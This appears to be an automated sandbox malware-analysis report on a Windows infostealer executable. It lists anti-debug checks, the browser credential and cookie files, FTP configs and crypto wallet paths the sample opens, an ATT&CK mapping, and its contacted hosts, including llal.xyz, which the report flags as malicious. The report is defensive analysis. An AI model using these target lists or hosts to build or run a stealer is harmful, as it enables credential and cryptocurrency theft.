          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009002E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009002E4
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0594049B mov edx, dword ptr fs:[00000030h]1_2_0594049B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05940A5B mov eax, dword ptr fs:[00000030h]1_2_05940A5B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05940E0B mov eax, dword ptr fs:[00000030h]1_2_05940E0B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059410AA mov eax, dword ptr fs:[00000030h]1_2_059410AA
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059410AB mov eax, dword ptr fs:[00000030h]1_2_059410AB
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00834B20 GetProcessHeap,HeapAlloc,1_2_00834B20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009002E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009002E4
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00866740 SetUnhandledExceptionFilter,1_2_00866740
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00900D89 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00900D89
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0091399F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0091399F
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00900456 cpuid 1_2_00900456
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00922707
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_0091E83C
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_00922958
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00922A00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_00922CC0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_00922C53
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_00922D95
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_00922DE0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00922E87
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: EnumSystemLocalesW,1_2_0091EE2D
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: GetLocaleInfoW,1_2_00922F8D
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00878530 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,1_2_00878530
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0091688D GetTimeZoneInformation,1_2_0091688D
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089AD80 __Init_thread_header,GetVersionExW,GetProductInfo,__Init_thread_header,GetNativeSystemInfo,1_2_0089AD80

          Stealing of Sensitive Information

          Source: Yara match File source: Process Memory Space: 0x001900000002ab40-59.exe PID: 7584, type: MEMORYSTR
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "\\Roaming\\Electrum\\wallets",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "\\Roaming\\ElectronCash\\wallets",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\*\*
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "f": [ "app-store.json", "simple-storage.json", "*finger-print*", "window-state.json" ],
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "f": [ "exodus.conf.json", "window-state.json", "passphrase.json", "seed.seco", "info.seco" ],
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.000000000828F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Exodus
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "\\Roaming\\Ethereum",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725564468.0000000008280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "\\Roaming\\MultiDoge",
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725830139.000000000830C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ledger Live
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\FTP Now\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Program Files (x86)\DeluxeFTP\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\UltraFXP\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\BitKinex\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\FTPBox\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Program Files (x86)\GoFTP\settings\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Binance\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\BBQCoin\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Megacoin\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Mincoin\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Namecoin\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Primecoin\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Terracoin\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
          Source: Yara match File source: 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000003.1722996754.00000000082AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1725697054.00000000082AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: 0x001900000002ab40-59.exe PID: 7584, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match File source: Process Memory Space: 0x001900000002ab40-59.exe PID: 7584, type: MEMORYSTR
          Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information
          Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server
          Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts
          Execution: 2 Command and Scripting Interpreter | 1 Native API | At | Cron | Launchd
          Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script
          Privilege Escalation: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script
          Defense Evasion: 1 Masquerading | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 1 DLL Side-Loading | Software Packing
          Credential Access: 2 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets
          Discovery: 2 System Time Discovery | 31 Security Software Discovery | 2 Process Discovery | 2 File and Directory Discovery | 25 System Information Discovery
          Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH
          Collection: 1 Archive Collected Data | 4 Data from Local System | Data from Network Shared Drive | Input Capture | Keylogging
          Command and Control: 11 Encrypted Channel | 1 Ingress Tool Transfer | 3 Non-Application Layer Protocol | 14 Application Layer Protocol | Fallback Channels
          Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer
          Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact

          Source | Detection | Scanner | Label | Link
          0x001900000002ab40-59.exe | 11% | ReversingLabs |  |
          0x001900000002ab40-59.exe | 20% | Virustotal |  | Browse
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          steamcommunity.com | 0% | Virustotal |  | Browse
          llal.xyz | 0% | Virustotal |  | Browse
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          steamcommunity.com | 104.102.42.29 | true | false |  | unknown
          llal.xyz | 188.114.97.3 | true | true |  | unknown
          Name | Malicious | Antivirus Detection | Reputation
          https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d | false |  | unknown
          https://steamcommunity.com/profiles/76561199619938930 | false |  | unknown
          https://llal.xyz/Up | false |  | unknown
          https://llal.xyz/Up/b | false |  | unknown
                          unknown
                          https://steamcommunity.com/profiles/76561199619938930dll0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://s.ytimg.com;0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://steam.tv/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://llal.xyz/Up/b60x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://llal.xyz/Up/b/0x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://store.steampowered.com/privacy_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://store.steampowered.com/points/shop/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://crl.rootca1.amazontrust.com/rootca1.crl00x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://llal.xyz/u0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://ocsp.rootca1.amazontrust.com0:0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://llal.xyz/s0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://sketchfab.com0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.ecosia.org/newtab/0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://lv.queniujq.cn0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://steamcommunity.com/profiles/76561199619938930e0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.youtube.com/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199619938930[1].htm.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://store.steampowered.com/privacy_agreement/0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://llal.xyz/0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1670243798.0000000008290000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1658364365.0000000008290000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962010x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                unknown
                                                https://www.google.com/recaptcha/0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://checkout.steampowered.com/0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMB0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                      unknown
                                                      https://crash-reports.browser.yandex.net/submit~S0x001900000002ab40-59.exe, 00000001.00000000.1519545162.0000000000933000.00000002.00000001.01000000.00000003.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://storage.ape.yandex.net/get/browser/install?ui=&result=cancelled&time=&download_time=&install0x001900000002ab40-59.exefalse
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drfalse
                                                          • URL Reputation: safe
                                                          unknown
